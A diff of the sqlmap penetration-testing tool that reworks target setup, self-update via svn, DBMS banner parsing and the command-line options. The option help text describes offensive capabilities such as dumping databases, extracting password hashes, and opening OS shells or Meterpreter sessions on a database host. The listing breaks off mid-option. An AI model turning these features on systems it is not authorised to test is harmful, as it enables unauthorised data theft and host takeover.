-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,17 +22,11 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import os
-import re
 import time

 from lib.core.common import dataToSessionFile
 from lib.core.common import paramToDict
-from lib.core.common import parseTargetUrl
-from lib.core.common import readInput
-from lib.core.convert import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -43,7 +37,6 @@ from lib.core.exception import sqlmapGenericException
 from lib.core.exception import sqlmapSyntaxException
 from lib.core.session import resumeConfKb

-
 def __setRequestParams():
    """
    Check and set the parameters and perform checks on 'data' option for
@@ -67,19 +60,19 @@ def __setRequestParams():
        raise sqlmapSyntaxException, errMsg

    if conf.data:
-        urlDecodedData = urldecode(conf.data).replace("%", "%%")
-        conf.parameters["POST"] = urlDecodedData
-        __paramDict = paramToDict("POST", urlDecodedData)
+        conf.parameters["POST"] = conf.data
+        __paramDict = paramToDict("POST", conf.data)

        if __paramDict:
            conf.paramDict["POST"] = __paramDict
            __testableParameters = True

+        conf.method = "POST"
+
    # Perform checks on Cookie parameters
    if conf.cookie:
-        urlDecodedCookie = urldecode(conf.cookie).replace("%", "%%")
-        conf.parameters["Cookie"] = urlDecodedCookie
-        __paramDict = paramToDict("Cookie", urlDecodedCookie)
+        conf.parameters["Cookie"] = conf.cookie
+        __paramDict = paramToDict("Cookie", conf.cookie)

        if __paramDict:
            conf.paramDict["Cookie"] = __paramDict
@@ -89,7 +82,8 @@ def __setRequestParams():
    if conf.httpHeaders:
        for httpHeader, headerValue in conf.httpHeaders:
            if httpHeader == "User-Agent":
-                conf.parameters["User-Agent"] = urldecode(headerValue).replace("%", "%%")
+                # No need for url encoding/decoding the user agent
+                conf.parameters["User-Agent"] = headerValue

                condition  = not conf.testParameter
                condition |= "User-Agent" in conf.testParameter
@@ -111,13 +105,18 @@ def __setRequestParams():
        errMsg += "within the GET, POST and Cookie parameters"
        raise sqlmapGenericException, errMsg

-
 def __setOutputResume():
    """
    Check and set the output text file and the resume functionality.
    """

-    if conf.sessionFile and os.path.exists(conf.sessionFile):
+    if not conf.sessionFile:
+        conf.sessionFile = "%s%ssession" % (conf.outputPath, os.sep)
+
+    logger.info("using '%s' as session file" % conf.sessionFile)
+
+    if os.path.exists(conf.sessionFile):
+        if not conf.flushSession:
            readSessionFP = open(conf.sessionFile, "r")
            lines = readSessionFP.readlines()
    
@@ -154,8 +153,14 @@ def __setOutputResume():
                        kb.resumedQueries[url][expression] = value
    
            readSessionFP.close()
+        else:
+            try:
+                os.remove(conf.sessionFile)
+                logger.info("flushing session file")
+            except OSError, msg:
+                errMsg = "unable to flush the session file (%s)" % msg
+                raise sqlmapFilePathException, errMsg

-    if conf.sessionFile:
    try:
        conf.sessionFP = open(conf.sessionFile, "a")
        dataToSessionFile("\n[%s]\n" % time.strftime("%X %x"))
@@ -163,7 +168,6 @@ def __setOutputResume():
        errMsg = "unable to write on the session file specified"
        raise sqlmapFilePathException, errMsg

-
 def __createFilesDir():
    """
    Create the file directory.
@@ -177,7 +181,6 @@ def __createFilesDir():
    if not os.path.isdir(conf.filePath):
        os.makedirs(conf.filePath, 0755)

-
 def __createDumpDir():
    """
    Create the dump directory.
@@ -191,17 +194,6 @@ def __createDumpDir():
    if not os.path.isdir(conf.dumpPath):
        os.makedirs(conf.dumpPath, 0755)

-
-def initTargetEnv():
-    """
-    Initialize target environment.
-    """
-
-    parseTargetUrl()
-    __setRequestParams()
-    __setOutputResume()
-
-
 def createTargetDirs():
    """
    Create the output directory.
@@ -219,3 +211,25 @@ def createTargetDirs():

    __createDumpDir()
    __createFilesDir()
+
+def initTargetEnv():
+    """
+    Initialize target environment.
+    """
+
+    if conf.multipleTargets:
+        conf.paramDict    = {}
+        conf.parameters   = {}
+        kb.dbms           = None
+        kb.dbmsDetected   = False
+        kb.dbmsVersion    = None
+        kb.injParameter   = None
+        kb.injPlace       = None
+        kb.injType        = None
+        kb.parenthesis    = None
+        kb.unionComment   = ""
+        kb.unionCount     = None
+        kb.unionPosition  = None
+
+    __setRequestParams()
+    __setOutputResume()
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,19 +22,14 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 class Unescaper:
    def __init__(self):
        self.__unescaper = None

-
    def setUnescape(self, unescapeFunction):
        self.__unescaper = unescapeFunction

-
    def unescape(self, expression, quote=True):
        return self.__unescaper(expression, quote=quote)

-
 unescaper = Unescaper()
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,19 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import difflib
 import os
 import re
 import shutil
+import sys
 import tempfile
+import time
 import urlparse
 import zipfile

 from distutils.dir_util import mkpath
 from xml.dom.minidom import Document

+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import pollProcess
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
@@ -42,18 +47,15 @@ from lib.core.data import paths
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.settings import MSSQL_VERSIONS_URL
-from lib.core.settings import SQLMAP_VERSION_URL
-from lib.core.settings import SQLMAP_SOURCE_URL
 from lib.core.settings import VERSION
 from lib.request.connect import Connect as Request

-
 def __updateMSSQLXML():
    infoMsg = "updating Microsoft SQL Server XML versions file"
    logger.info(infoMsg)

    try:
-        mssqlVersionsHtmlString = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True)
+        mssqlVersionsHtmlString, _ = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True)
    except sqlmapConnectionException, _:
        __mssqlPath     = urlparse.urlsplit(MSSQL_VERSIONS_URL)
        __mssqlHostname = __mssqlPath[1]
@@ -108,12 +110,15 @@ def __updateMSSQLXML():
                servicePack = servicePack[:servicePack.index("-")]
            if "*" in servicePack:
                servicePack = servicePack[:servicePack.index("*")]
+            if servicePack.startswith("+"):
+                servicePack = "0%s" % servicePack

            servicePack = servicePack.replace("\t", " ")
            servicePack = servicePack.replace("  ", " ")
            servicePack = servicePack.replace("No SP", "0")
            servicePack = servicePack.replace("RTM", "0")
            servicePack = servicePack.replace("SP", "")
+            servicePack = servicePack.replace("Service Pack", "")
            servicePack = servicePack.replace("<a href=\"http:", "")

            if servicePack.endswith(" "):
@@ -188,154 +193,66 @@ def __updateMSSQLXML():
            logger.info(infoMsg)

            # Compare the old XML file with the new one
-            differ = difflib.Differ()
-            differences = list(differ.compare(oldMssqlXmlList, newMssqlXmlList))
-
-            # Show only the different lines
-            for line in differences:
-                if line.startswith("-") or line.startswith("+") or line.startswith("?"):
-                    print line.strip("\n")
+            diff = difflib.unified_diff(oldMssqlXmlList, newMssqlXmlList, "%s.bak" % paths.MSSQL_XML, paths.MSSQL_XML)
+            sys.stdout.writelines(diff)
    else:
        infoMsg  = "no new Microsoft SQL Server versions since the "
        infoMsg += "last update"
        logger.info(infoMsg)

-
-def __createFile(pathname, data):
-    mkpath(os.path.dirname(pathname))
-
-    fileFP = open(pathname, "wb")
-    fileFP.write(data)
-    fileFP.close()
-
-
-def __extractZipFile(tempDir, zipFile, sqlmapNewestVersion):
-    # Check if the saved binary file is really a ZIP file
-    if zipfile.is_zipfile(zipFile):
-        sqlmapZipFile = zipfile.ZipFile(zipFile)
-    else:
-        raise sqlmapFilePathException, "the downloaded file does not seem to be a ZIP file"
-
-    # Extract each file within the ZIP file in the temporary directory
-    for info in sqlmapZipFile.infolist():
-        if info.filename[-1] != '/':
-            data = sqlmapZipFile.read(info.filename)
-            __createFile(os.path.join(tempDir, info.filename), data)
-
-
 def __updateSqlmap():
-    infoMsg = "updating sqlmap"
-    logger.info(infoMsg)
+    rootDir = paths.SQLMAP_ROOT_PATH

-    debugMsg = "checking if a new version is available"
-    logger.debug(debugMsg)
+    infoMsg = "updating sqlmap to latest development version from the "
+    infoMsg += "subversion repository"
+    logger.info(infoMsg)

    try:
-        sqlmapNewestVersion = Request.getPage(url=SQLMAP_VERSION_URL, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(SQLMAP_VERSION_URL)
-        __sqlmapHostname = __sqlmapPath[1]
+        import pysvn

-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    sqlmapNewestVersion = str(sqlmapNewestVersion).replace("\n", "")
-    sqlmapNewestVersion = "0.6.1"
-
-    if not re.search("^([\w\.\-]+)$", sqlmapNewestVersion):
-        errMsg = "sqlmap version is in a wrong syntax"
-        logger.errMsg(errMsg)
-
-        return
-
-    if sqlmapNewestVersion == VERSION:
-        infoMsg = "you are already running sqlmap latest stable version"
-        logger.info(infoMsg)
-
-        return
-
-    elif sqlmapNewestVersion > VERSION:
-        infoMsg  = "sqlmap latest stable version is %s. " % sqlmapNewestVersion
-        infoMsg += "Going to download it from the SourceForge File List page"
-        logger.info(infoMsg)
-
-    elif sqlmapNewestVersion < VERSION:
-        infoMsg  = "if you are running a version of sqlmap more updated than "
-        infoMsg += "the latest stable version (%s)" % sqlmapNewestVersion
-        logger.info(infoMsg)
-
-        return
-
-    sqlmapBinaryStringUrl = SQLMAP_SOURCE_URL % sqlmapNewestVersion
-
-    try:
-        sqlmapBinaryString = Request.getPage(url=sqlmapBinaryStringUrl, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(sqlmapBinaryStringUrl)
-        __sqlmapHostname = __sqlmapPath[1]
-
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    debugMsg  = 'saving the sqlmap compressed source to a ZIP file into '
-    debugMsg += 'the temporary directory and extract it'
+        debugMsg = "sqlmap will update itself using installed python-svn "
+        debugMsg += "third-party library, http://pysvn.tigris.org/"
        logger.debug(debugMsg)

-    tempDir = tempfile.gettempdir()
-    zipFile = os.path.join(tempDir, "sqlmap-%s.zip" % sqlmapNewestVersion)
-    __createFile(zipFile, sqlmapBinaryString)
-    __extractZipFile(tempDir, zipFile, sqlmapNewestVersion)
+        def notify(event_dict):
+            action = str(event_dict['action'])
+            index = action.find('_')
+            prefix = action[index + 1].upper() if index != -1 else action.capitalize()

-    # For each file and directory in the temporary directory copy it
-    # to the sqlmap root path and set right permission
-    # TODO: remove files not needed anymore and all pyc within the
-    # sqlmap root path in the end
-    for root, dirs, files in os.walk(os.path.join(tempDir, "sqlmap-%s" % sqlmapNewestVersion)):
-        # Just for development release
-        if '.svn' in root:
-            continue
+            if action.find('_update') != -1:
+                return

-        cleanRoot = root.replace(tempDir, "")
-        cleanRoot = cleanRoot.replace("%ssqlmap-%s" % (os.sep, sqlmapNewestVersion), "")
-
-        if cleanRoot.startswith(os.sep):
-            cleanRoot = cleanRoot[1:]
-
-        for f in files:
-            # Just for development release
-            if f.endswith(".pyc") or f.endswith(".pyo"):
-                continue
-
-            srcFile = os.path.join(root, f)
-            dstFile = os.path.join(paths.SQLMAP_ROOT_PATH, os.path.join(cleanRoot, f))
-
-            if f == "sqlmap.conf" and os.path.exists(dstFile):
-                infoMsg = "backupping configuration file to '%s.bak'" % dstFile
-                logger.info(infoMsg)
-                shutil.move(dstFile, "%s.bak" % dstFile)
-
-            if os.path.exists(dstFile):
-                debugMsg = "replacing file '%s'" % dstFile
+            if action.find('_completed') == -1:
+                print "%s\t%s" % (prefix, event_dict['path'])
            else:
-                debugMsg = "creating new file '%s'" % dstFile
+                revision = str(event_dict['revision'])
+                index = revision.find('number ')

+                if index != -1:
+                    revision = revision[index+7:].strip('>')
+
+                logger.info('updated to the latest revision %s' % revision)
+
+        client = pysvn.Client()
+        client.callback_notify = notify
+        client.update(rootDir)
+    except ImportError, _:
+        debugMsg = "sqlmap will try to update itself using 'svn' command"
        logger.debug(debugMsg)

-            mkpath(os.path.dirname(dstFile))
-            shutil.copy(srcFile, dstFile)
+        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)

-            if f.endswith(".py"):
-                os.chmod(dstFile, 0755)
-
-    infoMsg = "sqlmap updated successfully"
-    logger.info(infoMsg)
+        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
+        pollProcess(process)
+        svnStdout, svnStderr = process.communicate()

+        if svnStderr:
+            errMsg = svnStderr.strip()
+            logger.error(errMsg)
+        elif svnStdout:
+            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
+            if revision:
+                logger.info('updated to the latest revision %s' % revision.group(1))

 def update():
    if not conf.updateAll:
--- a/lib/parse/init.py
+++ b/lib/parse/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import re

 from xml.sax import parse
@@ -31,25 +29,33 @@ from xml.sax.handler import ContentHandler

 from lib.core.common import checkFile
 from lib.core.common import sanitizeStr
+from lib.core.data import kb
+from lib.core.data import paths
+from lib.parse.handler import FingerprintHandler

-
-class bannerHandler(ContentHandler):
+class MSSQLBannerHandler(ContentHandler):
    """
-    This class defines methods to parse and extract information from
-    the given DBMS banner based upon the data in XML file
+    This class defines methods to parse and extract information from the
+    given Microsoft SQL Server banner based upon the data in XML file
    """

-    def __init__(self, banner):
+    def __init__(self, banner, info):
        self.__banner        = sanitizeStr(banner)
-        self.release         = None
-        self.version         = None
-        self.servicePack     = None
        self.__inVersion     = False
        self.__inServicePack = False
        self.__release       = None
        self.__version       = ""
+        self.__versionAlt    = None
        self.__servicePack   = ""
+        self.__info          = info

+    def __feedInfo(self, key, value):
+        value = sanitizeStr(value)
+
+        if value in ( None, "None" ):
+            return
+
+        self.__info[key] = value

    def startElement(self, name, attrs):
        if name == "signatures":
@@ -61,44 +67,60 @@ class bannerHandler(ContentHandler):
        elif name == "servicepack":
            self.__inServicePack = True

-
    def characters(self, data):
        if self.__inVersion:
            self.__version += sanitizeStr(data)
        elif self.__inServicePack:
            self.__servicePack += sanitizeStr(data)

-
    def endElement(self, name):
        if name == "signature":
-            if re.search(" %s[\.\ ]+" % self.__version, self.__banner):
-                self.release     = self.__release
-                self.version     = self.__version
-                self.servicePack = self.__servicePack
+            for version in (self.__version, self.__versionAlt):
+                if version and re.search(" %s[\.\ ]+" % version, self.__banner):
+                    self.__feedInfo("dbmsRelease", self.__release)
+                    self.__feedInfo("dbmsVersion", self.__version)
+                    self.__feedInfo("dbmsServicePack", self.__servicePack)
+                    break

            self.__version     = ""
+            self.__versionAlt  = None
            self.__servicePack = ""

-
        elif name == "version":
            self.__inVersion = False
            self.__version = self.__version.replace(" ", "")
            
+            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self.__version)
+            self.__versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None
+
        elif name == "servicepack":
            self.__inServicePack = False
            self.__servicePack = self.__servicePack.replace(" ", "")

-
-
-def bannerParser(banner, xmlfile):
+def bannerParser(banner):
    """
    This function calls a class to extract information from the given
    DBMS banner based upon the data in XML file
    """

+    if kb.dbms == "Microsoft SQL Server":
+        xmlfile = paths.MSSQL_XML
+    elif kb.dbms == "MySQL":
+        xmlfile = paths.MYSQL_XML
+    elif kb.dbms == "Oracle":
+        xmlfile = paths.ORACLE_XML
+    elif kb.dbms == "PostgreSQL":
+        xmlfile = paths.PGSQL_XML
+
    checkFile(xmlfile)
-    banner = sanitizeStr(banner)
-    handler = bannerHandler(banner)
+
+    if kb.dbms == "Microsoft SQL Server":
+        handler = MSSQLBannerHandler(banner, kb.bannerFp)
        parse(xmlfile, handler)

-    return handler.release, handler.version, handler.servicePack
+        handler = FingerprintHandler(banner, kb.bannerFp)
+        parse(paths.GENERIC_XML, handler)
+    else:
+        handler = FingerprintHandler(banner, kb.bannerFp)
+        parse(xmlfile, handler)
+        parse(paths.GENERIC_XML, handler)
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,7 +22,7 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
+import sys

 from optparse import OptionError
 from optparse import OptionGroup
@@ -31,32 +31,43 @@ from optparse import OptionParser
 from lib.core.data import logger
 from lib.core.settings import VERSION_STRING

-
 def cmdLineParser():
    """
    This function parses the command line parameters and arguments
    """

-    usage = "sqlmap.py [options] {-u <URL> | -g <google dork> | -c <config file>}"
+    usage = "%s [options]" % sys.argv[0]
    parser = OptionParser(usage=usage, version=VERSION_STRING)

    try:
-        # Request options
-        request = OptionGroup(parser, "Request", "These options have to "
-                              "be specified to set the target url, HTTP "
-                              "method, how to connect to the target url "
-                              "or Google dorking results in general.")
+        parser.add_option("-v", dest="verbose", type="int", default=1,
+                          help="Verbosity level: 0-5 (default 1)")

-        request.add_option("-u", "--url", dest="url", help="Target url")
+        # Target options
+        target = OptionGroup(parser, "Target", "At least one of these "
+                             "options has to be specified to set the source "
+                             "to get target urls from.")

-        request.add_option("-g", dest="googleDork",
+        target.add_option("-u", "--url", dest="url", help="Target url")
+
+        target.add_option("-l", dest="list", help="Parse targets from Burp "
+                          "or WebScarab proxy logs")
+
+        target.add_option("-r", dest="requestFile",
+                          help="Load HTTP request from a file")
+
+        target.add_option("-g", dest="googleDork",
                          help="Process Google dork results as target urls")

-        request.add_option("-p", dest="testParameter",
-                           help="Testable parameter(s)")
+        target.add_option("-c", dest="configFile",
+                          help="Load options from a configuration INI file")
+
+        # Request options
+        request = OptionGroup(parser, "Request", "These options can be used "
+                              "to specify how to connect to the target url.")

        request.add_option("--method", dest="method", default="GET",
-                           help="HTTP method, GET or POST (default: GET)")
+                           help="HTTP method, GET or POST (default GET)")

        request.add_option("--data", dest="data",
                           help="Data string to be sent through POST")
@@ -64,8 +75,13 @@ def cmdLineParser():
        request.add_option("--cookie", dest="cookie",
                           help="HTTP Cookie header")

-        request.add_option("--referer", dest="referer",
-                           help="HTTP Referer header")
+        request.add_option("--cookie-urlencode", dest="cookieUrlencode",
+                             action="store_true",
+                             help="URL Encode generated cookie injections")
+
+        request.add_option("--drop-set-cookie", dest="dropSetCookie",
+                           action="store_true",
+                           help="Ignore Set-Cookie header from response")

        request.add_option("--user-agent", dest="agent",
                           help="HTTP User-Agent header")
@@ -74,44 +90,136 @@ def cmdLineParser():
                           help="Load a random HTTP User-Agent "
                                "header from file")

+        request.add_option("--referer", dest="referer",
+                           help="HTTP Referer header")
+
+        request.add_option("--headers", dest="headers",
+                           help="Extra HTTP headers newline separated")
+
        request.add_option("--auth-type", dest="aType",
-                           help="HTTP Authentication type, value: "
-                                "Basic or Digest")
+                           help="HTTP authentication type "
+                                "(Basic, Digest or NTLM)")

        request.add_option("--auth-cred", dest="aCred",
-                           help="HTTP Authentication credentials, value: "
-                                "name:password")
+                           help="HTTP authentication credentials "
+                                "(name:password)")
+                                
+        request.add_option("--auth-cert", dest="aCert",
+                           help="HTTP authentication certificate ("
+                                "key_file,cert_file)")

        request.add_option("--proxy", dest="proxy",
                           help="Use a HTTP proxy to connect to the target url")

-        request.add_option("--threads", dest="threads", type="int",
+        request.add_option("--ignore-proxy", dest="ignoreProxy",
+                            action="store_true",
+                           help="Ignore system default HTTP proxy")
+
+        request.add_option("--threads", dest="threads", type="int", default=1,
                           help="Maximum number of concurrent HTTP "
                                "requests (default 1)")

+        request.add_option("--delay", dest="delay", type="float",
+                           help="Delay in seconds between each HTTP request")
+
+        request.add_option("--timeout", dest="timeout", type="float", default=30,
+                           help="Seconds to wait before timeout connection "
+                                "(default 30)")
+
+        request.add_option("--retries", dest="retries", type="int", default=3,
+                           help="Retries when the connection timeouts "
+                                "(default 3)")
+
+        request.add_option("--scope", dest="scope", 
+                           help="Regexp to filter targets from provided proxy log")
+
        # Injection options
-        injection = OptionGroup(parser, "Injection")
+        injection = OptionGroup(parser, "Injection", "These options can be "
+                                "used to specify which parameters to test "
+                                "for, provide custom injection payloads and "
+                                "how to parse and compare HTTP responses "
+                                "page content when using the blind SQL "
+                                "injection technique.")
+
+        injection.add_option("-p", dest="testParameter",
+                             help="Testable parameter(s)")
+
+        injection.add_option("--dbms", dest="dbms",
+                             help="Force back-end DBMS to this value")
+
+        injection.add_option("--os", dest="os",
+                             help="Force back-end DBMS operating system "
+                                  "to this value")
+
+        injection.add_option("--prefix", dest="prefix",
+                             help="Injection payload prefix string")
+
+        injection.add_option("--postfix", dest="postfix",
+                             help="Injection payload postfix string")

        injection.add_option("--string", dest="string",
                             help="String to match in page when the "
                                  "query is valid")

-        injection.add_option("--dbms", dest="dbms",
-                             help="Force back-end DBMS to this value")
+        injection.add_option("--regexp", dest="regexp",
+                             help="Regexp to match in page when the "
+                                  "query is valid")
+
+        injection.add_option("--excl-str", dest="eString",
+                             help="String to be excluded before comparing "
+                                  "page contents")
+
+        injection.add_option("--excl-reg", dest="eRegexp",
+                             help="Matches to be excluded before "
+                                  "comparing page contents")
+
+        # Techniques options
+        techniques = OptionGroup(parser, "Techniques", "These options can "
+                                 "be used to test for specific SQL injection "
+                                 "technique or to use one of them to exploit "
+                                 "the affected parameter(s) rather than using "
+                                 "the default blind SQL injection technique.")
+
+        techniques.add_option("--stacked-test", dest="stackedTest",
+                              action="store_true",
+                              help="Test for stacked queries (multiple "
+                                   "statements) support")
+
+        techniques.add_option("--time-test", dest="timeTest",
+                              action="store_true",
+                              help="Test for time based blind SQL injection")
+
+        techniques.add_option("--time-sec", dest="timeSec",
+                              type="int", default=5,
+                              help="Seconds to delay the DBMS response "
+                                   "(default 5)")
+
+        techniques.add_option("--union-test", dest="unionTest",
+                              action="store_true",
+                              help="Test for UNION query (inband) SQL injection")
+
+        techniques.add_option("--union-tech", dest="uTech",
+                              help="Technique to test for UNION query SQL injection")
+
+        techniques.add_option("--union-use", dest="unionUse",
+                              action="store_true",
+                              help="Use the UNION query (inband) SQL injection "
+                                   "to retrieve the queries output. No "
+                                   "need to go blind")

        # Fingerprint options
        fingerprint = OptionGroup(parser, "Fingerprint")

        fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
                               action="store_true",
-                               help="Perform an extensive database fingerprint")
+                               help="Perform an extensive DBMS version fingerprint")

        # Enumeration options
        enumeration = OptionGroup(parser, "Enumeration", "These options can "
                                  "be used to enumerate the back-end database "
                                  "management system information, structure "
                                  "and data contained in the tables. Moreover "
-                                  "you can run your own SQL SELECT queries.")
+                                  "you can run your own SQL statements.")

        enumeration.add_option("-b", "--banner", dest="getBanner",
                               action="store_true", help="Retrieve DBMS banner")
@@ -124,30 +232,32 @@ def cmdLineParser():
                               action="store_true",
                               help="Retrieve DBMS current database")

+        enumeration.add_option("--is-dba", dest="isDba",
+                               action="store_true",
+                               help="Detect if the DBMS current user is DBA")
+
        enumeration.add_option("--users", dest="getUsers", action="store_true",
                               help="Enumerate DBMS users")

        enumeration.add_option("--passwords", dest="getPasswordHashes",
                               action="store_true",
-                               help="Enumerate DBMS users password hashes (opt: -U)")
+                               help="Enumerate DBMS users password hashes")

        enumeration.add_option("--privileges", dest="getPrivileges",
                               action="store_true",
-                               help="Enumerate DBMS users privileges (opt: -U)")
+                               help="Enumerate DBMS users privileges")

        enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                               help="Enumerate DBMS databases")

        enumeration.add_option("--tables", dest="getTables", action="store_true",
-                               help="Enumerate DBMS database tables (opt: -D)")
+                               help="Enumerate DBMS database tables")

        enumeration.add_option("--columns", dest="getColumns", action="store_true",
-                               help="Enumerate DBMS database table columns "
-                                    "(req: -T, -D)")
+                               help="Enumerate DBMS database table columns")

        enumeration.add_option("--dump", dest="dumpTable", action="store_true",
-                               help="Dump DBMS database table entries "
-                                    "(req: -T, -D opt: -C, --start, --stop)")
+                               help="Dump DBMS database table entries")

        enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
                               help="Dump all DBMS databases tables entries")
@@ -170,74 +280,134 @@ def cmdLineParser():
                                    "enumerating tables")

        enumeration.add_option("--start", dest="limitStart", type="int",
-                               help="First table entry to dump")
+                               help="First query output entry to retrieve")

        enumeration.add_option("--stop", dest="limitStop", type="int",
-                               help="Last table entry to dump")
+                               help="Last query output entry to retrieve")
+
+        enumeration.add_option("--first", dest="firstChar", type="int",
+                               help="First query output word character to retrieve")
+
+        enumeration.add_option("--last", dest="lastChar", type="int",
+                               help="Last query output word character to retrieve")

        enumeration.add_option("--sql-query", dest="query",
-                               help="SQL SELECT query to be executed")
+                               help="SQL statement to be executed")

        enumeration.add_option("--sql-shell", dest="sqlShell",
                               action="store_true",
                               help="Prompt for an interactive SQL shell")

+        # User-defined function options
+        udf = OptionGroup(parser, "User-defined function injection", "These "
+                          "options can be used to create custom user-defined "
+                          "functions.")
+
+        udf.add_option("--udf-inject", dest="udfInject", action="store_true",
+                       help="Inject custom user-defined functions")
+
+        udf.add_option("--shared-lib", dest="shLib",
+                       help="Local path of the shared library")
+
        # File system options
        filesystem = OptionGroup(parser, "File system access", "These options "
                                 "can be used to access the back-end database "
-                                 "management system file system taking "
-                                 "advantage of native DBMS functions or "
-                                 "specific DBMS design weaknesses.")
+                                 "management system underlying file system.")

        filesystem.add_option("--read-file", dest="rFile",
-                              help="Read a specific OS file content (only on MySQL)")
+                              help="Read a file from the back-end DBMS "
+                                   "file system")

        filesystem.add_option("--write-file", dest="wFile",
-                              help="Write to a specific OS file (not yet available)")
+                              help="Write a local file on the back-end "
+                                   "DBMS file system")
+
+        filesystem.add_option("--dest-file", dest="dFile",
+                              help="Back-end DBMS absolute filepath to "
+                                   "write to")

        # Takeover options
-        takeover = OptionGroup(parser, "Operating system access", "This "
-                               "option can be used to access the back-end "
-                               "database management system operating "
-                               "system taking advantage of specific DBMS "
-                               "design weaknesses.")
+        takeover = OptionGroup(parser, "Operating system access", "These "
+                               "options can be used to access the back-end "
+                               "database management system underlying "
+                               "operating system.")
+
+        takeover.add_option("--os-cmd", dest="osCmd",
+                            help="Execute an operating system command")

        takeover.add_option("--os-shell", dest="osShell", action="store_true",
-                            help="Prompt for an interactive OS shell "
-                                 "(only on PHP/MySQL environment with a "
-                                 "writable directory within the web "
-                                 "server document root for the moment)")
+                            help="Prompt for an interactive operating "
+                                 "system shell")
+
+        takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
+                            help="Prompt for an out-of-band shell, "
+                                 "meterpreter or VNC")
+
+        takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
+                            help="One click prompt for an OOB shell, "
+                                 "meterpreter or VNC")
+
+        takeover.add_option("--os-bof", dest="osBof", action="store_true",
